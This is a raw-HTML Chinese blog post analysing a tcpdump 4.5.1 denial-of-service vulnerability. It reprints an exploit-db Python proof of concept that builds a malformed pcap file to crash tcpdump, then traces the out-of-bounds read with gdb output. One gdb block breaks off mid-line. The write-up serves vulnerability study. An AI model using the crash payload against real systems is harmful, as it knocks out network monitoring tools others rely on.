2019-03-23 04:36:08 +00:00
<!DOCTYPE html>
< html class = "theme-next gemini use-motion" lang = "zh-Hans" >
< head > < meta name = "generator" content = "Hexo 3.8.0" >
< meta charset = "UTF-8" >
< meta http-equiv = "X-UA-Compatible" content = "IE=edge" >
< meta name = "viewport" content = "width=device-width, initial-scale=1, maximum-scale=1" >
< meta name = "theme-color" content = "#222" >
< meta http-equiv = "Cache-Control" content = "no-transform" >
< meta http-equiv = "Cache-Control" content = "no-siteapp" >
< link href = "/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel = "stylesheet" type = "text/css" >
< link href = "/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel = "stylesheet" type = "text/css" >
< link href = "/css/main.css?v=5.1.4" rel = "stylesheet" type = "text/css" >
< link rel = "apple-touch-icon" sizes = "180x180" href = "/images/apple-touch-icon-next.png?v=5.1.4" >
< link rel = "icon" type = "image/png" sizes = "32x32" href = "/images/hackerrank.png?v=5.1.4" >
< link rel = "icon" type = "image/png" sizes = "16x16" href = "/images/hackerrank.png?v=5.1.4" >
< link rel = "mask-icon" href = "/images/logo.svg?v=5.1.4" color = "#222" >
2019-03-23 04:40:50 +00:00
< meta name = "keywords" content = "TCPDUMP,拒绝服务攻击," >
2019-03-23 04:36:08 +00:00
< meta name = "description" content = "TCPDUMP 4.5.1 拒绝服务攻击漏洞分析一、Tcpdump介绍 tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统: 包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中, tcpdump 需要使用libpcap这个捕捉数" >
2019-03-23 04:40:50 +00:00
< meta name = "keywords" content = "TCPDUMP,拒绝服务攻击" >
2019-03-23 04:36:08 +00:00
< meta property = "og:type" content = "article" >
< meta property = "og:title" content = "TCPDUMP拒绝服务攻击漏洞" >
2019-03-23 04:42:19 +00:00
< meta property = "og:url" content = "https://cool-y.github.io/2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html" >
2019-03-23 04:36:08 +00:00
< meta property = "og:site_name" content = "混元霹雳手" >
< meta property = "og:description" content = "TCPDUMP 4.5.1 拒绝服务攻击漏洞分析一、Tcpdump介绍 tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统: 包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中, tcpdump 需要使用libpcap这个捕捉数" >
< meta property = "og:locale" content = "zh-Hans" >
2019-03-23 04:42:19 +00:00
< meta property = "og:updated_time" content = "2019-03-23T04:41:58.890Z" >
2019-03-23 04:36:08 +00:00
< meta name = "twitter:card" content = "summary" >
< meta name = "twitter:title" content = "TCPDUMP拒绝服务攻击漏洞" >
< meta name = "twitter:description" content = "TCPDUMP 4.5.1 拒绝服务攻击漏洞分析一、Tcpdump介绍 tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统: 包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中, tcpdump 需要使用libpcap这个捕捉数" >
< script type = "text/javascript" id = "hexo.configurations" >
var NexT = window.NexT || {};
var CONFIG = {
root: '/',
scheme: 'Gemini',
version: '5.1.4',
sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
fancybox: true,
tabs: true,
motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
duoshuo: {
userId: '0',
author: '博主'
},
algolia: {
applicationID: '',
apiKey: '',
indexName: '',
hits: {"per_page":10},
labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
}
};
< / script >
2019-03-23 04:42:19 +00:00
< link rel = "canonical" href = "https://cool-y.github.io/2018/12/25/TCPDUMP拒绝服务攻击漏洞/" >
2019-03-23 04:36:08 +00:00
< title > TCPDUMP拒绝服务攻击漏洞 | 混元霹雳手< / title >
< / head >
< body itemscope itemtype = "http://schema.org/WebPage" lang = "zh-Hans" >
< div class = "container sidebar-position-left page-post-detail" >
< div class = "headband" > < / div >
< header id = "header" class = "header" itemscope itemtype = "http://schema.org/WPHeader" >
< div class = "header-inner" > < div class = "site-brand-wrapper" >
< div class = "site-meta " >
< div class = "custom-logo-site-title" >
< a href = "/" class = "brand" rel = "start" >
< span class = "logo-line-before" > < i > < / i > < / span >
< span class = "site-title" > 混元霹雳手< / span >
< span class = "logo-line-after" > < i > < / i > < / span >
< / a >
< / div >
< p class = "site-subtitle" > < / p >
< / div >
< div class = "site-nav-toggle" >
< button >
< span class = "btn-bar" > < / span >
< span class = "btn-bar" > < / span >
< span class = "btn-bar" > < / span >
< / button >
< / div >
< / div >
< nav class = "site-nav" >
< ul id = "menu" class = "menu" >
< li class = "menu-item menu-item-home" >
< a href = "/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-home" > < / i > < br >
首页
< / a >
< / li >
< li class = "menu-item menu-item-about" >
< a href = "/about/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-user" > < / i > < br >
关于
< / a >
< / li >
< li class = "menu-item menu-item-tags" >
< a href = "/tags/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-tags" > < / i > < br >
标签
< / a >
< / li >
< li class = "menu-item menu-item-categories" >
< a href = "/categories/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-th" > < / i > < br >
分类
< / a >
< / li >
< li class = "menu-item menu-item-archives" >
< a href = "/archives/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-archive" > < / i > < br >
归档
< / a >
< / li >
< li class = "menu-item menu-item-search" >
< a href = "javascript:;" class = "popup-trigger" >
< i class = "menu-item-icon fa fa-search fa-fw" > < / i > < br >
搜索
< / a >
< / li >
< / ul >
< div class = "site-search" >
< div class = "popup search-popup local-search-popup" >
< div class = "local-search-header clearfix" >
< span class = "search-icon" >
< i class = "fa fa-search" > < / i >
< / span >
< span class = "popup-btn-close" >
< i class = "fa fa-times-circle" > < / i >
< / span >
< div class = "local-search-input-wrapper" >
< input autocomplete = "off" placeholder = "搜索..." spellcheck = "false" type = "text" id = "local-search-input" >
< / div >
< / div >
< div id = "local-search-result" > < / div >
< / div >
< / div >
< / nav >
< / div >
< / header >
< main id = "main" class = "main" >
< div class = "main-inner" >
< div class = "content-wrap" >
< div id = "content" class = "content" >
< div id = "posts" class = "posts-expand" >
< article class = "post post-type-normal" itemscope itemtype = "http://schema.org/Article" >
< div class = "post-block" >
2019-03-23 04:42:19 +00:00
< link itemprop = "mainEntityOfPage" href = "https://cool-y.github.io/2018/12/25/TCPDUMP拒绝服务攻击漏洞/" >
2019-03-23 04:36:08 +00:00
< span hidden itemprop = "author" itemscope itemtype = "http://schema.org/Person" >
< meta itemprop = "name" content = "Cool-Y" >
< meta itemprop = "description" content >
< meta itemprop = "image" content = "/images/avatar.png" >
< / span >
< span hidden itemprop = "publisher" itemscope itemtype = "http://schema.org/Organization" >
< meta itemprop = "name" content = "混元霹雳手" >
< / span >
< header class = "post-header" >
< h1 class = "post-title" itemprop = "name headline" > TCPDUMP拒绝服务攻击漏洞< / h1 >
< div class = "post-meta" >
< span class = "post-time" >
< span class = "post-meta-item-icon" >
< i class = "fa fa-calendar-o" > < / i >
< / span >
< span class = "post-meta-item-text" > 发表于< / span >
2019-03-23 04:42:19 +00:00
< time title = "创建于" itemprop = "dateCreated datePublished" datetime = "2018-12-25T12:26:05+08:00" >
2018-12-25
2019-03-23 04:36:08 +00:00
< / time >
< / span >
2019-03-23 04:40:50 +00:00
< span class = "post-category" >
< span class = "post-meta-divider" > |< / span >
< span class = "post-meta-item-icon" >
< i class = "fa fa-folder-o" > < / i >
< / span >
< span class = "post-meta-item-text" > 分类于< / span >
< span itemprop = "about" itemscope itemtype = "http://schema.org/Thing" >
< a href = "/categories/二进制漏洞/" itemprop = "url" rel = "index" >
< span itemprop = "name" > 二进制漏洞< / span >
< / a >
< / span >
< / span >
2019-03-23 04:36:08 +00:00
< span class = "post-comments-count" >
< span class = "post-meta-divider" > |< / span >
< span class = "post-meta-item-icon" >
< i class = "fa fa-comment-o" > < / i >
< / span >
2019-03-23 04:42:19 +00:00
< a href = "/2018/12/25/TCPDUMP拒绝服务攻击漏洞/#comments" itemprop = "discussionUrl" >
< span class = "post-comments-count gitment-comments-count" data-xid = "/2018/12/25/TCPDUMP拒绝服务攻击漏洞/" itemprop = "commentsCount" > < / span >
2019-03-23 04:36:08 +00:00
< / a >
< / span >
2019-03-23 04:42:19 +00:00
< span id = "/2018/12/25/TCPDUMP拒绝服务攻击漏洞/" class = "leancloud_visitors" data-flag-title = "TCPDUMP拒绝服务攻击漏洞" >
2019-03-23 04:36:08 +00:00
< span class = "post-meta-divider" > |< / span >
< span class = "post-meta-item-icon" >
< i class = "fa fa-eye" > < / i >
< / span >
< span class = "post-meta-item-text" > 阅读次数: < / span >
< span class = "leancloud-visitors-count" > < / span >
< / span >
< div class = "post-wordcount" >
< span class = "post-meta-item-icon" >
< i class = "fa fa-file-word-o" > < / i >
< / span >
< span title = "字数统计" >
3.4k 字
< / span >
< span class = "post-meta-divider" > |< / span >
< span class = "post-meta-item-icon" >
< i class = "fa fa-clock-o" > < / i >
< / span >
< span title = "阅读时长" >
16 分钟
< / span >
< / div >
< / div >
< / header >
< div class = "post-body" itemprop = "articleBody" >
< h1 id = "TCPDUMP-4-5-1-拒绝服务攻击漏洞分析" > < a href = "#TCPDUMP-4-5-1-拒绝服务攻击漏洞分析" class = "headerlink" title = "TCPDUMP 4.5.1 拒绝服务攻击漏洞分析" > < / a > TCPDUMP 4.5.1 拒绝服务攻击漏洞分析< / h1 > < h2 id = "一、Tcpdump介绍" > < a href = "#一、Tcpdump介绍" class = "headerlink" title = "一、Tcpdump介绍" > < / a > 一、Tcpdump介绍< / h2 > < ol >
< li > tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统: 包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中, tcpdump 需要使用libpcap这个捕捉数据的库。其在Windows下的版本称为WinDump; 它需要WinPcap驱动, 相当于在Linux平台下的libpcap.< / li >
< li > tcpdump能够分析网络行为, 性能和应用产生或接收网络流量。它支持针对网络层、协议、主机、网络或端口的过滤, 并提供and、or、not等逻辑语句来帮助你去掉无用的信息, 从而使用户能够进一步找出问题的根源。< / li >
< li > 也可以使用 tcpdump 的实现特定目的,例如在路由器和网关之间拦截并显示其他用户或计算机通信。通过 tcpdump 分析非加密的流量, 如Telnet或HTTP的数据包, 查看登录的用户名、密码、网址、正在浏览的网站内容, 或任何其他信息。因此系统中存在网络分析工具主要不是对本机安全的威胁, 而是对网络上的其他计算机的安全存在威胁。< / li >
< / ol >
2019-03-23 04:40:50 +00:00
< h2 id = "二、分析环境" > < a href = "#二、分析环境" class = "headerlink" title = "二、分析环境" > < / a > 二、分析环境< / h2 > < ul >
< li > Ubuntu 16.04.4 LTS i686< / li >
< li > tcpdump 4.5.1< / li >
< li > gdb with peda< / li >
< / ul >
2019-03-23 04:36:08 +00:00
< h2 id = "三、漏洞复现" > < a href = "#三、漏洞复现" class = "headerlink" title = "三、漏洞复现" > < / a > 三、漏洞复现< / h2 > < p > 这个漏洞触发的原因是, tcpdump在处理特殊的pcap包的时候, 由于对数据包传输数据长度没有进行严格的控制, 导致在连续读取数据包中内容超过一定长度后, 会读取到无效的内存空间, 从而导致拒绝服务的发生。对于这个漏洞, 首先要对pcap包的结构进行一定的分析, 才能够最后分析出漏洞的成因, 下面对这个漏洞进行复现。< / p >
< h3 id = "1-编译安装tcpdump" > < a href = "#1-编译安装tcpdump" class = "headerlink" title = "1.编译安装tcpdump" > < / a > 1.编译安装tcpdump< / h3 > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. # apt-get install libpcap-dev< / span > < br > < span class = "line" > 2. # dpkg -l libpcap-dev< / span > < br > < span class = "line" > 3. # wget https://www.exploit-db.com/apps/973a2513d0076e34aa9da7e15ed98e1b-tcpdump-4.5.1.tar.gz< / span > < br > < span class = "line" > 4. # tar -zxvf 973a2513d0076e34aa9da7e15ed98e1b-tcpdump-4.5.1.tar.gz< / span > < br > < span class = "line" > 5. # cd tcpdump-4.5.1/< / span > < br > < span class = "line" > 6. # ./configure< / span > < br > < span class = "line" > 7. # make< / span > < br > < span class = "line" > 8. # make install< / span > < br > < span class = "line" > 9. # tcpdump – -version< / span > < br > < span class = "line" > tcpdump version 4.5.1< / span > < br > < span class = "line" > libpcap version 1.7.4< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< h3 id = "2-生成payload( 来自exploit-db-payload) " > < a href = "#2-生成payload( 来自exploit-db-payload) " class = "headerlink" title = "2.生成payload( 来自exploit-db payload) " > < / a > 2.生成payload( 来自exploit-db payload) < / h3 > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < span class = "line" > 29< / span > < br > < span class = "line" > 30< / span > < br > < span class = "line" > 31< / span > < br > < span class = "line" > 32< / span > < br > < span class = "line" > 33< / span > < br > < span class = "line" > 34< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > # Exploit Title: tcpdump 4.5.1 Access Violation Crash< / span > < br > < span class = "line" > # Date: 31st May 2016< / span > < br > < span class = "line" > # Exploit Author: David Silveiro< / span > < br > < span class = "line" > # Vendor Homepage: http://www.tcpdump.org< / span > < br > < span class = "line" > # Software Link: http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz< / span > < br > < span class = "line" > # Version: 4.5.1< / span > < br > < span class = "line" > # Tested on: Ubuntu 14 LTS< / span > < br > < span class = "line" > from subprocess import call< / span > < br > < span class = "line" > from shlex import split< / span > < br > < span class = "line" > from time import sleep< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > def crash():< / span > < br > < span class = "line" > command = ' tcpdump -r crash' < / span > < br > < span class = "line" > buffer = ' \xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\xf5\xff' < / span > < br > < span class = "line" > buffer += ' \x00\x00\x00I\x00\x00\x00\xe6\x00\x00\x00\x00\x80\x00' < / span > < br > < span class = "line" > buffer += ' \x00\x00\x00\x00\x00\x08\x00\x00\x00\x00< \x9c7@\xff\x00' < / span > < br > < span class = "line" > buffer += ' \x06\xa0r\x7f\x00\x00\x01\x7f\x00\x00\xec\x00\x01\xe0\x1a' < / span > < br > < span class = "line" > buffer += " \x00\x17g+++++++\x85\xc9\x03\x00\x00\x00\x10\xa0& \x80\x18\' " < / span > < br > < span class = "line" > buffer += " xfe$\x00\x01\x00\x00@\x0c\x04\x02\x08\n' , ' \x00\x00\x00\x00" < / span > < br > < span class = "line" > buffer += ' \x00\x00\x00\x00\x01\x03\x03\x04' < / span > < br > < span class = "line" > with open(' crash' , ' w+b' ) as file:< / span > < br > < span class = "line" > file.write(buffer)< / span > < br > < span class = "line" > try:< / span > < br > < span class = "line" > call(split(command))< / span > < br > < span class = "line" > print(" Exploit successful! " )< / span > < br > < span class = "line" > except:< / span > < br > < span class = "line" > print(" Error: Something has gone wrong!" )< / span > < br > < span class = "line" > def main():< / span > < br > < span class = "line" > print(" Author: David Silveiro " )< / span > < br > < span class = "line" > print(" tcpdump version 4.5.1 Access Violation Crash " )< / span > < br > < span class = "line" > sleep(2)< / span > < br > < span class = "line" > crash()< / span > < br > < span class = "line" > if __name__ == " __main__" :< / span > < br > < span class = "line" > main()< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< h2 id = "四、崩溃分析" > < a href = "#四、崩溃分析" class = "headerlink" title = "四、崩溃分析" > < / a > 四、崩溃分析< / h2 > < h3 id = "1-pcap包格式" > < a href = "#1-pcap包格式" class = "headerlink" title = "1.pcap包格式" > < / a > 1.pcap包格式< / h3 > < p > 首先来分析一下pcap包的格式, 首先是pcap文件头的内容, 在.h有所定义, 这里将结构体以及对应变量含义都列出来。< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > struct pcap_file_header { < / span > < br > < span class = "line" > bpf_u_int32 magic;< / span > < br > < span class = "line" > u_short version_major;< / span > < br > < span class = "line" > u_short version_minor;< / span > < br > < span class = "line" > bpf_int32 thiszone; /* gmt to local correction */< / span > < br > < span class = "line" > bpf_u_int32 sigfigs; /* accuracy of timestamps */< / span > < br > < span class = "line" > bpf_u_int32 snaplen; /* max length saved portion of each pkt */< / span > < br > < span class = "line" > bpf_u_int32 linktype; /* data link type (LINKTYPE_*) */< / span > < br > < span class = "line" > } ;< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > 看一下各字段的含义:< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > magic: 4字节 pcap文件标识 目前为“d4 c3 b2 a1”< / span > < br > < span class = "line" > major: 2字节 主版本号 #define PCAP_VERSION_MAJOR 2< / span > < br > < span class = "line" > minor: 2字节 次版本号 #define PCAP_VERSION_MINOR 4< / span > < br > < span class = "line" > thiszone: 4字节 时区修正 并未使用, 目前全为0< / span > < br > < span class = "line" > sigfigs: 4字节 精确时间戳 并未使用, 目前全为0< / span > < br > < span class = "line" > snaplen: 4字节 抓包最大长度 如果要抓全, 设为0x0000ffff( 65535) , < / span > < br > < span class = "line" > tcpdump -s 0就是设置这个参数, 缺省为68字节< / span > < br > < span class = "line" > linktype: 4字节 链路类型 一般都是1: ethernet< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > struct pcap_pkthdr { < / span > < br > < span class = "line" > struct timeval ts; /* time stamp */< / span > < br > < span class = "line" > bpf_u_int32 caplen; /* length of portion present */< / span > < br > < span class = "line" > bpf_u_int32 len; /* length this packet (off wire) */< / span > < br > < span class = "line" > } ;< / span > < br > < span class = "line" > struct timeval { < / span > < br > < span class = "line" > long tv_sec; /* seconds (XXX should be time_t) */< / span > < br > < span class = "line" > suseconds_t tv_usec; /* and microseconds */< / span > < br > < span class = "line" > } ;< / span > < br > < span class = "line" > ts: 8字节 抓包时间 4字节表示秒数, 4字节表示微秒数< / span > < br > < span class = "line" > caplen: 4字节 保存下来的包长度( 最多是snaplen, 比如68字节) < / span > < br > < span class = "line" > len: 4字节 数据包的真实长度, 如果文件中保存的不是完整数据包, 可能比caplen大< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > 其中len变量是值得关注的, 因为在crash文件中, 对应len变量的值为00 3C 9C 37< br > 这是一个很大的值, 读取出来就是379C3C00, 数非常大, 实际上在wireshark中打开这个crash文件, 就会报错, 会提示这个数据包的长度已经超过了范围, 而换算出来的长度就是379C3C00, 这是触发漏洞的关键。< / p >
< h3 id = "2-gdb调试" > < a href = "#2-gdb调试" class = "headerlink" title = "2.gdb调试" > < / a > 2.gdb调试< / h3 > < p > 首先通过gdb运行tcpdump, 用-r参数打开poc生成的crash, tcp崩溃, 到达漏洞触发位置< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < span class = "line" > 29< / span > < br > < span class = "line" > 30< / span > < br > < span class = "line" > 31< / span > < br > < span class = "line" > 32< / span > < br > < span class = "line" > 33< / span > < br > < span class = "line" > 34< / span > < br > < span class = "line" > 35< / span > < br > < span class = "line" > 36< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. Program received signal SIGSEGV, Segmentation fault.< / span > < br > < span class = "line" > 2. [----------------------------------registers-----------------------------------]< / span > < br > < span class = "line" > 3. EAX: 0x1< / span > < br > < span class = "line" > 4. EBX: 0x81e33bd --> 0x0< / span > < br > < span class = "line" > 5. ECX: 0x2e (' .' )< / span > < br > < span class = "line" > 6. EDX: 0x0< / span > < br > < span class = "line" > 7. ESI: 0xbfffe201 (' .' < repeats 14 times> )< / span > < br > < span class = "line" > 8. EDI: 0xbfffe1db --> 0x30303000 (' ' )< / span > < br > < span class = "line" > 9. EBP: 0x10621< / span > < br > < span class = "line" > 10. ESP: 0xbfffe1ac --> 0x8053caa (< hex_and_ascii_print_with_offset+170> : mov ecx,DWORD PTR [esp+0xc])< / span > < br > < span class = "line" > 11. EIP: 0x8053c6a (< hex_and_ascii_print_with_offset+106> : movzx edx,BYTE PTR [ebx+ebp*2+0x1])< / span > < br > < span class = "line" > 12. EFLAGS: 0x10296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)< / span > < br > < span class = "line" > 13. [-------------------------------------code-------------------------------------]< / span > < br > < span class = "line" > 14. 0x8053c5d < hex_and_ascii_print_with_offset+93> : je 0x8053d40 < hex_and_ascii_print_with_offset+320> < / span > < br > < span class = "line" > 15. 0x8053c63 < hex_and_ascii_print_with_offset+99> : mov ebx,DWORD PTR [esp+0x18]< / span > < br > < span class = "line" > 16. 0x8053c67 < hex_and_ascii_print_with_offset+103> : sub esp,0x4< / span > < br > < span class = "line" > 17. => 0x8053c6a < hex_and_ascii_print_with_offset+106> : movzx edx,BYTE PTR [ebx+ebp*2+0x1]< / span > < br > < span class = "line" > 18. 0x8053c6f < hex_and_ascii_print_with_offset+111> : movzx ecx,BYTE PTR [ebx+ebp*2]< / span > < br > < span class = "line" > 19. 0x8053c73 < hex_and_ascii_print_with_offset+115> : push edx< / span > < br > < span class = "line" > 20. 0x8053c74 < hex_and_ascii_print_with_offset+116> : mov ebx,edx< / span > < br > < span class = "line" > 21. 0x8053c76 < hex_and_ascii_print_with_offset+118> : mov DWORD PTR [esp+0x18],edx< / span > < br > < span class = "line" > 22. [------------------------------------stack-------------------------------------]< / span > < br > < span class = "line" > 23. 0000| 0xbfffe1ac --> 0x8053caa (< hex_and_ascii_print_with_offset+170> : mov ecx,DWORD PTR [esp+0xc])< / span > < br > < span class = "line" > 24. 0004| 0xbfffe1b0 --> 0xb7fff000 --> 0x23f3c< / span > < br > < span class = "line" > 25. 0008| 0xbfffe1b4 --> 0x1< / span > < br > < span class = "line" > 26. 0012| 0xbfffe1b8 --> 0x2f5967 (' gY/' )< / span > < br > < span class = "line" > 27. 0016| 0xbfff
< p > 从崩溃信息来看, 出错位置为s2 = < em > cp++;崩溃原因为SIGSEGV, 即进程执行了一段无效的内存引用或发生段错误。可以看到, 问题出现在./print-ascii.c:91, 而且此时指针读取[ebx+ebp< / em > 2+0x1]的内容,可能是越界读取造成的崩溃。< br > 再结合源码信息可知, 指针cp在自加的过程中访问到了一个没有权限访问的地址, 因为这是写在一个while循环里, 也就是是说nshorts的值偏大, 再看nshorts怎么来的, 由此nshorts = length / sizeof(u_short);可知, 可能是函数传入的参数length没有控制大小导致, 因此目标就是追踪length是如何传入的。< br > 我们通过bt回溯一下调用情况。< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. gdb-peda$ bt< / span > < br > < span class = "line" > 2. #0 hex_and_ascii_print_with_offset (ident=0x80c04af " \n\t" , cp=0x8204000 < error: Cannot access memory at address 0x8204000> ,< / span > < br > < span class = "line" > 3. length=0xfffffff3, oset=0x20c40) at ./print-ascii.c:91< / span > < br > < span class = "line" > 4. #1 0x08053e26 in hex_and_ascii_print (ident=0x80c04af " \n\t" , cp=0x81e33bd " " , length=0xfffffff3) at ./print-ascii.c:127< / span > < br > < span class = "line" > 5. #2 0x08051e7d in ieee802_15_4_if_print (ndo=0x81e1320 < Gndo> , h=0xbfffe40c, p=< optimized out> ) at ./print-802_15_4.c:180< / span > < br > < span class = "line" > 6. #3 0x080a0aea in print_packet (user=0xbfffe4dc " \023\036\b\300\034\005\b\001" , h=0xbfffe40c, sp=0x81e33a8 " @\377" )< / span > < br > < span class = "line" > 7. at ./tcpdump.c:1950< / span > < br > < span class = "line" > 8. #4 0xb7fa3468 in ?? () from /usr/lib/i386-linux-gnu/libpcap.so.0.8< / span > < br > < span class = "line" > 9. #5 0xb7f940e3 in pcap_loop () from /usr/lib/i386-linux-gnu/libpcap.so.0.8< / span > < br > < span class = "line" > 10. #6 0x0804b3dd in main (argc=0x3, argv=0xbffff6c4) at ./tcpdump.c:1569< / span > < br > < span class = "line" > 11. #7 0xb7de9637 in __libc_start_main (main=0x804a4c0 < main> , argc=0x3, argv=0xbffff6c4, init=0x80b1230 < __libc_csu_init> ,< / span > < br > < span class = "line" > 12. fini=0x80b1290 < __libc_csu_fini> , rtld_fini=0xb7fea880 < _dl_fini> , stack_end=0xbffff6bc) at ../csu/libc-start.c:291< / span > < br > < span class = "line" > 13. #8 0x0804c245 in _start ()< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > 函数调用流程< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > pcap_loop< / span > < br > < span class = "line" > |----print_packet< / span > < br > < span class = "line" > |-----hex_and_ascii_print< / span > < br > < span class = "line" > |-------- hex_and_ascii_print_with_offset< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
